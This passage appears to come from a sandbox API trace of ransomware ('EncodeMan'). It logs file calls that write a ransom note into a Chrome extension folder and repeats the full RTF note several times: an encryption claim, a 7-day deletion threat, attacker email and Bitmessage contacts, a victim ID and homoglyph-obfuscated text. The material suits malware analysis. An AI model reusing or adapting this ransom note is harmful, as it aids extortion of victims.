\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n£\x94\x12ç]z9úW­Á\x7fvß\x84ôΧÐùæËH3\n", lpUsedDefaultChar=0x0) returned 8717 [0278.532] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.533] CloseHandle (hObject=0x2c8) returned 1 [0278.533] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0278.533] GetLastError () returned 0x2 [0278.533] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.548] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.548] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.548] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d 